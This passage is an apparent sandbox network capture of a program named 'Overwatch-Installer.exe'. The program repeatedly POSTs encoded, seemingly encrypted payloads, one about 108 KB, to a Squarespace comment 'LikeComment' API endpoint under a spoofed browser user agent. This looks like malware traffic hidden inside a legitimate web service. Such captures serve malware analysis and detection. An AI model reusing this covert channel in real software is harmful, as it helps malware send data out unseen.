=xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2PKsfgYOPYqLUQITYELVREKif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:45 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:45 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWiLCDXg_CONMTA3MmQxZTFlMmNhN2U4MGZjMDlkMmRlZTdjOTM4; Path=/; Secure Set-Cookie: crumb=BdiBiFgtpeLlYTdjYmM0MWIzODQwMzFhYjQyYTE3YWI4NDNjMjg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WpF6bVG1/LQ6uwyEV Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdiBiFgtpeLlYTdjYmM0MWIzODQwMzFhYjQyYTE3YWI4NDNjMjg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49791	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:45 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:45 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:45 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 47 39 42 79 30 53 71 74 6d 78 39 41 37 2f 5a 6b 54 6e 4f 54 51 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2G9By0Sqtmx9A7/ZkTnOTQ6if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:46 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:45 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BedW0aRT7wHEOWI0NjY0ZmU5NmYwYjVkYjM3MzBiNmJlZDI3NTE2; Path=/; Secure Set-Cookie: crumb=BbjhlwfsTODiOTU3MmNiYjIzYTkxOWZhODlkMzFlZDJhZTE3ZjVj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: pzrgoFEf/Hb1NXYh7 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbjhlwfsTODiOTU3MmNiYjIzYTkxOWZhODlkMzFlZDJhZTE3ZjVj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49793	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:46 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:46 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:46 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:46 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:46 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWJkUuLFVHYMMzk0NzU1YWQ1NDliYWI5MzdhZjQ2OGE1OGU4ZmY5; Path=/; Secure Set-Cookie: crumb=BVRi5bYaOsmvYWU2MzVjMTQ0ODA4ZWY0ODc4ODUzOTc4OWM5OTRm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 1aJ7F9Ol/ZjiGSopX Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVRi5bYaOsmvYWU2MzVjMTQ0ODA4ZWY0ODc4ODUzOTc4OWM5OTRm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49795	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:46 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:46 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:46 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:47 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:46 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bc-rQvxn41DtMzc4NTc5YzU4ZDE5NmU0NzgwNDQ5ZjBiMDRjZDVl; Path=/; Secure Set-Cookie: crumb=BbBiteyKFzoAODE5OWE5OGVmZjA2MGNiOGU2ZjkzMjFiMWEyMzEz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: vB8J0lfa/OD77UyHx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbBiteyKFzoAODE5OWE5OGVmZjA2MGNiOGU2ZjkzMjFiMWEyMzEz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49796	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:47 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:47 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:47 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:47 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bcpg50WhDQXGYjg3MjdmNGExMTRlNDlkYmY3NWU0YTFjODljMGFm; Path=/; Secure Set-Cookie: crumb=BayCrCDBTY9LM2QyNWVjMzVlMzU3Y2MzYmE3MjBmYjljNGRhOTcz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: V7lB2mVS/jCrFtCwD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BayCrCDBTY9LM2QyNWVjMzVlMzU3Y2MzYmE3MjBmYjljNGRhOTcz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49797	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:47 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:47 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 64 70 66 69 44 77 54 4b 6b 47 76 78 62 76 31 50 37 68 31 6e 6b 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9dpfiDwTKkGvxbv1P7h1nkwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:47 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:47 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:47 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:47 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:47 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:48 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:47 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZqQBo7XCOfrZDA1Yjk1N2ZmZWU5ZDcyYzkyYzZmNWZhMWE3NTNm; Path=/; Secure Set-Cookie: crumb=BYhYRi3HZwcPNjhlNTE0NjBkOTllMzg2MzE0YTA0NGY1YTVmMmUx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: VYFugrIg/6G0SrBOM Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYhYRi3HZwcPNjhlNTE0NjBkOTllMzg2MzE0YTA0NGY1YTVmMmUx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49798	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:47 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:48 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:48 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bf5rqzJTa_MtN2QxNTk4ZWQ0NDk4ZTRiODg4NDM5MmFhMWYyMTQw; Path=/; Secure Set-Cookie: crumb=BYLJj9KdH9JmZDk1Nzk0NmU5NWI4MTk5ZWI2ODQ5NTQ5YzZkMTAx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WcgGZsGm/XH8870W4 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYLJj9KdH9JmZDk1Nzk0NmU5NWI4MTk5ZWI2ODQ5NTQ5YzZkMTAx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49799	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:48 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
